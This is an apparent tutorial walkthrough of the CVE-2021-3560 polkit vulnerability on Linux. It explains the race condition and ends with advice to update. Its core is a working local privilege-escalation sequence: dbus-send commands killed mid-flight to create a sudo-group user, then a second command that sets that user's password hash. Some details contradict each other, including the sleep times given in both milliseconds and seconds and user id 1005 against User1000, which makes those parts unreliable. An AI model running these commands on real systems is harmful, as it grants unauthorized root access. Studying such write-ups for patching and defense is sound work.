- Introduction
In 2021, a researcher named Kevin BackHouse discovered a privilege escalation vulnerability in the polkit utility. however, not all linux versions are vulnerable to polkit.
Below is an example of a vulnerable version;
- Red Hat Enterprise Linux 8
- Fedora 21 (or later)
- Debian Testing ("Bullseye")
- Ubuntu 20.04 LTS ("Focal Fossa")
The most modern versions of linux already have the correction of this vulnerability, however, older versions as mentioned above, still have this vulnerability.
The Polkit is a system service installed by default on many Linux distributions. It’s used by systemd, so any Linux distribution that uses systemd also uses polkit.
The Polkit is the system service that’s running under the hood when you see a dialog box, exemple;
If at any time you need to change privileges or do something that requires higher privileges like creating a user account, Polkit is responsible for allowing or denying that action.
The CVE-2021-3560 enables an unprivileged local attacker to gain root privileges. It’s very simple and quick to exploit, so it’s important that you update your Linux installations as soon as possible. Any system that has polkit version 0.113 (or later) installed is vulnerable. That includes popular distributions such as RHEL 8 and Ubuntu 20.04.
Manually sending dbus messages to the dbus-daemon (effectively an API to allow different processes the ability to communicate with each other), then killing the request before it has been fully processed, we can trick polkit into authorising the command.
The dbus-daemon is a program running in the background which brokers messages between applications.
Basically the replay of this vulnerability will be done by following the steps below;
-
The attacker manually sends a dbus message to the accounts-daemon requesting the creation of a new account with sudo permissions (or latterly, a password to be set for the new user). This message gets given a unique ID by the dbus-daemon.
-
The attacker kills the message after polkit receives it, but before polkit has a chance to process the message. This effectively destroys the unique message ID.
-
Polkit asks the dbus-daemon for the user ID of the user who sent the message, referencing the (now deleted) message ID.
-
The dbus-daemon can't find the message ID because we killed it in step two. It handles the error by responding with an error code.
-
Polkit mishandles the error and substitutes in 0 for the user ID -- i.e. the root account of the machine.
-
Thinking that the root user requested the action, polkit allows the request to go through unchallenged.
In short, by destroying the message ID before the dbus-daemon has a chance to give polkit the correct ID, we exploit the poor error-handling in polkit to trick the utility into thinking that the request was made by the all-powerful root user.
- Let's add a new user called lucas, with sudo permissions, and a password of banana.
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:lucas string:"test vulns" int32:1
In this case, when trying to create the user lucas, we get a message that we don't have permission (Authentication is required).
This command will manually send a dbus message to the accounts daemon, printing the response and creating a new user called lucas(string:lucas), with a description of "test vulns" (string:"test vulns") and membership of the sudo group set to true (referenced by the int32:1).
- As this is effectively a race condition, we first need to determine how long our command will take to run. Let's try this with the first dbus message:
time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:lucas string:"test vulns" int32:1
In this case, we use the same user creation command in step 1, however, we use the 'time' function to return the time of this command.
This takes 0.011 seconds. This number will be slightly different each time you run the command.
- We need to kill the command approximately halfway through execution. let's try to interrupt the process with 0.005 seconds, ok? (This value changes for each case).
Let's try this. We need to send the dbus message, then kill it about halfway through:
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:lucas string:"test vulns" int32:1 & sleep 0.005s; kill $!
we sent the dbus message in a background job (using the ampersand to background the command). We then told it to sleep for 0.005 milliseconds, then kill the previous process ($!). This successfully created the new user, adding them into the sudo group. We should note down at this point that the user ID of the new user in this instance is 1000.
- We need a password hash here, so let's generate a Sha512Crypt hash for our chosen password (banana):
Using openssl, we generate a password of type 6 (SHA512-crypt) and our plaintext password.
- The 0.135 milliseconds worked, so lets try again
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$jErqxzPvzrnXP8uC$j8p1DAuEMe0mnM8Pkm3VkVPL5fPWk7c0fFuZkLCi8/hTb5a/ATZjfwHSwEbhQFZR98xWemFWQHEGaTr8KcKaz0' string:'test vulns' & sleep 0.005s; kill $!
In this case we are including a password (banana) for the id 1005 that was created in the steps above.
This vulnerability was publicly disclosed, and the fix was released on June 3, 2021 and was assigned CVE-2021-3560.
Check the update of your machine with yum/apt update/upgrade.